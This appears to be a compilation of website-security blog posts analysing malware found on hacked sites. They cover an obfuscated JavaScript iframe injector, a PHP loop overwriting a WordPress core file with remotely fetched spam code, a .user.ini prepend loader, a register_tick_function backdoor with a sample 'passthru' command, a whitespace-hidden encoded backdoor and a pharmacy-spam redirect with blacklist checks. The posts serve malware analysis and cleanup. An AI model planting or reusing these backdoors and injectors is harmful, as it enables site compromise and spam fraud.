Ghost from the Past

Some sites may stay infected or not properly cleaned for years. Eventually, they come to us and we clean them. It doesn’t matter whether the malware is old or new. But old malware may tell stories for those who can read it.

For example, this February (2017), we cleaned one site with infected JavaScript files. There was nothing special; everything was cleaned automatically. However our analyst, Moe Obaid ,decided to take a look at the removed code:

date=new Date();var ar="pE=C r:]?me;...cw{ 'nBgNA>}h)ly";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f12,0,60,12,24,-33,...skipped...126,-63,69,-72,6,9,54,-105,-21,0,120]".replace(k.substr(0,1),'[');
pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);
e=e();ar2=e(ar2);s="";var pos=0;
for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);e(s);

The obfuscation was quite familiar, but this time my attention was drawn to the following code:

pau="rn ev2010".replace(date.getFullYear()-1,"al");

In order to deobfuscate the code, the result of this expression should be "rn eval" (to form the "return eval") in the next statement. But as you can see, this could only happen back in 2011! So I had to slightly modify the code to deobfuscate it, which gave me this code for invisible iframe:

<i f r a m e src='hxxp://g3service[.]ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQQHDQAMAg==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></i f r a m e>

Indeed, this malware was active back in June of 2011 and now the domain is defunct.

This information is enough to tell us that the malware was designed to only work in 2011 (back then hackers liked to use disposable domains for just a few days or even hours) and that the site hasn’t been properly cleaned for more than five years. Since 2012, that defunct malware stayed there like a ghost from the past.

When malware injection goes wrong

Today while scanning a client’s website, I found a failed attempt by attackers to hide the location of a backdoor. It is very common for us to find backdoor uploaders on websites, as they are one of the principle ways attackers upload malicious content onto websites. However, there was something interesting about this particular case.

Our scanners found a file which triggered a generic signature php.backdoor.uploader_gen.007. Though we see a lot of trigger functions that may be used as backdoors, in this particular case, the file name stuck out to me:

./googlec4d267ac9f2bab3e.html

Anyone that uses Google Webmaster Tools will recognize this as a verification file for the analytics service. The attackers were hiding behind the legitimate filename and path, hoping that nobody would notice!

Accessing the file in my browser yielded this result:

What they didn’t realize is that usually .html files are not interpreted as php scripts. I’m sorry, better luck on the next injection.

This is a good example of why it’s important to employ the use of file integrity monitoring and any modifications to files on your website.

Fun fact: The usual size of a GWT verification file is around 50-55 bytes. If you ever hop onto your server and notice that your GWT file is much larger than that, then this simple trick might have been used against you!

Spam content injection

During a recent incident response investigation, we detected an infected website loading spam content from another location. The malware was responsible for fetching the spam and displaying it on the front page without the client's knowledge or consent.


Let’s break down the infection and work through it step by step.

First, the malware sets the ignore_user_abort function to true in order to ensure that the user cannot stop the file execution and that the file will not time out by setting the set_time_limit to 0.

<html><body>Nic No Removed Ver0.5<?php    ignore_user_abort(true);    set_time_limit(0); 

Then an infinite loop checks and recreates the malicious file over and over again. After the loop has started, it will kick off the next phase and check if the  wp-blog-header.php file is writeable. This file was not arbitrarily chosen; wp-blog-header.php is a WordPress core file, which means that the malware will be successfully loaded every time the blog is accessed. Afterwards, it replaces the original core file with an infected version fetched from a remote location.

    while(1){          $path ="/var/www/vhosts/site.com/httpdocs/wp-blog-header.php";                if (is_writable($path) == false) {            unlink ($path);echo "del" ;            chmod($path,0777);        

}file_put_contents($path,file_get_contents("hXXp://ga-google[.]com/Nic/feng/infecteddomain.txt"));

This infected domain.txt contains a similar copy of the core file “wp-blog-header.php” but is injected with a typical spam-seo malware. The interesting part is that the attacker had a file for every site infected with his malicious code.
As you can see in the following code snippet, it checks for the user-agent and creates links to this pirated Windows site if it’s the search engine rendering the page.

<?php$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);    $mysite = "http://victm-site.dom/";    $filename = "";    $fromsite = "hxxp://windowsiso[.]net/windows-7-iso/windows-7-download/professional-iso-7/";if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {    $ksite = !empty($_GET['p']) ? $_GET['p'] : "";    $list = array(        );    $listname = $filename . "?p=";    $liststr = "<div style='text-align: center'>";    foreach ($list as $key => $val) {      if ($ksite == $key) {            $fromsite = $val;      }      $liststr .= "<a href='" .$mysite .  $filename . "?p=" . $key . "'>" . $key . "</a>&nbsp;&nbsp;";    }    $liststr .= "</div>";    $url = empty($_GET['viewid']) ? "" : $_GET['viewid'];    $content = file_get_contents($fromsite . $url);    if (!empty($ksite)) {      $qstr = $filename . "?p=" . $ksite . "&viewid=";    } else {      $qstr = $filename . "?viewid=";    }    $repstr = $mysite . $qstr;    $content = str_ireplace('href="', 'href="/', $content);    $content = str_ireplace('href="//', 'href="/', $content);

This type of Malware is very common and can be used to inject many types of spam content into your website,causing an impact on your site’s SERP (Search Engine Result Pages). If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

.user.ini SPAM SEO Redirect

Since PHP 5.3.0, PHP includes support for configuration INI files on a per-directory basis that has the same effect (depending on the case) that the .htaccess files have on Apache. With that in mind, attackers are exploiting this feature to manipulate the search engine results in order to benefit malicious websites and redirect users to arbitrary spam content.


The payload is based on specific directives being injected into ".user.ini"; hence it's executed before the site is rendered. On Spam SEO redirects that use ".htaccess" rules only, the payload result is visible in the browser and not the malicious code itself. However, in this particular case, we were able to detect the malicious code.

Following, are the directives injected into “.user.ini”:

; Directive 1...auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'; END Directive 1

This type of .ini files doesn’t override all php.ini settings, however it allows attackers to use the auto_prepend directive, which will load a file that is parsed before the main php file. This file is included  by the require function. In this case auto_prepend_file was loading "/tmp/.tmp/wrtZaCDz2", which contained the following code:

<?php$mysqli_class = '/tmp/.tmp/wrtLaCDz7';$mysqli_init = file_get_contents($mysqli_class);$streams_cache = tmpfile();fwrite($streams_cache, gzuncompress($mysqli_init));$stream_id = stream_get_meta_data($streams_cache);include $stream_id['uri'];

After “gzuncompress()’ing” the content of the file "/tmp/.tmp/wrtLaCDz7", we get a malware that implements evasive techniques against different search engines, and assembles redirect links from the malicious website (hxxp://search-tracker[dot]com/in.cgi?7&parameter=$keyword&se=$se&ur=1).

This infection was found on servers running nginx, but as long as the ability to use .user.ini files is enabled, there’s a chance attackers may use it to take advantage of your resources. If you are not using the feature, we highly recommend disabling it to prevent any issues.

Backdooring sites using exotic php functions

Throughout the last few months, we published multiple articles about simple but powerful backdoors and how attackers get creative. Virtually in all cases, the code is designed to avoid detection and it’s not always highly encoded. Actually, we are seeing that most attackers are following the KISS ("Keep it simple, stupid”, “keep it short and simple”) principle and PHP is a vast programming language that can be used to implement malicious code in agreement with it.


During an investigation we found a small piece of code making use of the PHP function register_tick_function. A “tick” in PHP is an event that occurs within the domain of the function “register_tick_function()”.  This function is usually used for testing purposes (monitoring, profiling, etc), but as you might expect it can also be used for attackers to mask their code and  maintain access for as long as possible.

Here is the malicious snippet:

 declare(ticks=1)/*h85j7*/; @register_tick_function(${"_POST"}{'CEC'},@${"_POST"}{'Q36'} ); 

This piece of malware could be injected in virtually any php file on your server, either standalone or along with legit code and it executes whatever command you pass as argument through the 'CEC' and  'Q36' parameters following the next order:

CEC=passthru&Q36=whoami

As you may noticed the malware acts like a regular backdoor, allowing arbitrary command execution on affected websites while using not so popular PHP functions or noisy obfuscation methods that could raise the attention to the code.

If your website has been infected and need some help cleaning it up, please let us know.

Hiding malicious code from the user using white...

Over the years, attackers have used different techniques for hiding malicious files on websites. They obfuscated code, changed legit functions to execute malware, modified whole core files to execute their malicious activity and much more.


In this article, we’ll describe a simple way of hiding malware from non-experienced webmasters that are using text editors which do not wrap long lines of code. Instead of injecting complex and obfuscated code, attackers simply added white spaces in the beginning of the file. The snippet in question follows (please notice the scroll bar at the bottom):

At first glance, the file looked pretty normal. Upon further inspection, we noticed that there was a code shifted within 598 whitespace characters on the first row containing the following content:

<p

$x8 = "x63x68x72"; $E7 = "x69x6ex74x76x61x6c"; $Qb = $x8($E7("x31x30x31")).$x8($E7($x8($E7("x3….

In this particular case, the attacker hid a heavily-encoded PHP backdoor into the file. There are different attacks using this very same technique, such as, SEO Spam Injections, Credential & Credit Card Stealers, and others.

If you suspect any malware activity on your website and at first glance you cannot find anything suspicious, we recommend checking for modified files. If you are not comfortable to modify files and the database yourself,  you can rely on the Security Engineers at https://sucuri.net to clean and protect your website.

Checking blacklisted domains or IP for spamming

Often times we will encounter websites that have been injected with a redirect and these can vary from blackhat SEO tactics for boosting domain rankings all the way to phishing pages trying to steal login credentials. In this case, the redirect was contained within random alphanumerically named PHP files and it redirected visitors to the specified files and then to a pharmacy spam website that contained all of the drug names that you will commonly see in your emails located within your spam folder. This seems to indicate that the attacker was spamming from other third-party servers and within the pharmacy spam email they would include the URLs to the malicious file on our client’s web server. Let us analyze parts of this malicious file:


if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}}header('Location: http://[malicious domain]/');

The payload that is delivered to an unsuspecting visitor is a browser redirect in the form of the ‘header’ PHP function to a malicious domain. This same malicious file with the redirect will be placed on multiple websites that have been compromised already, then the attacker will direct traffic via hyperlinks in the outgoing spam emails to the compromised websites hosting the malicious file with the redirect. The goal of the attacker is to try and trick spam filters by using legitimate websites that have been compromised and contain the malicious redirect instead of using their actual pharmacy spam website within the spam email. If they did include their pharmacy spam website URL directly in the outgoing spam emails, then it would not be long until the spam filters (i.e Spamhaus) blacklist the entire domain name of the pharmacy spam website.

Another problem is that if the compromised websites, or their hosting IPs, become blacklisted then it will be detected by spam filters and also prevent delivery of the spam email due to them containing blacklisted content.

This means that the hacker will want to be able to regularly check upon the referring websites that contain the malicious redirect file and determine whether they have become blacklisted or not. In this specific malicious file, the blacklist checks were triggered through a $_GET request to the malicious file with a specified URL parameter. After such a request is received, it will trigger the PHP file to use the file_get_content function to obtain the output of the text version of Google SafeBrowsing Diagnostics page.  

if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');

Once a compromised referring website shows as blacklisted, or its hosting IP shows as blacklisted, then the hacker can stop redirecting from that domain or IP to prevent any negative impacts on their targeted domain.

As mentioned earlier, there are usually many compromised websites being used to refer/redirect to the targeted domain, and so to be efficient along with automating tasks; the attacker will then create a cron job or other scheduled task to send the $_GET request to the malicious file and based upon the returned HTTP code they will be able to determine whether the website or hosting IP address has been blacklisted. If it returns a 202 HTTP code when the cron job executes the $_GET request with the necessary URL parameter, then that means it is blacklisted by Google. Often times these cron jobs will output the results of the $_GET request into a file so it can be monitored over a period of time, but by default the cron job will send an email to the configured email address after each time the cron runs. Below is an example of such a cron job that runs every minute and stores the specific numerical HTTP code from the $_GET sent to the malicious redirect file on the compromised website:

# crontab -l* * * * * curl -sD - "http://localhost/malware.php?mod=00X" | grep HTTP | awk '{print $2}' > /tmp/http.txt

The following coding excerpt from the malicious redirect file shows how the script will immediately exit/terminate if it responds to a $_GET request with the HTTP code 202, which means there is a blacklisting active:

$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}}

The automated blacklist checking helps the attacker by allowing them to avoid sending their spam emails with blacklisted domains or blacklisted IP addresses as they are well aware that this curtails upon their redirect success rate.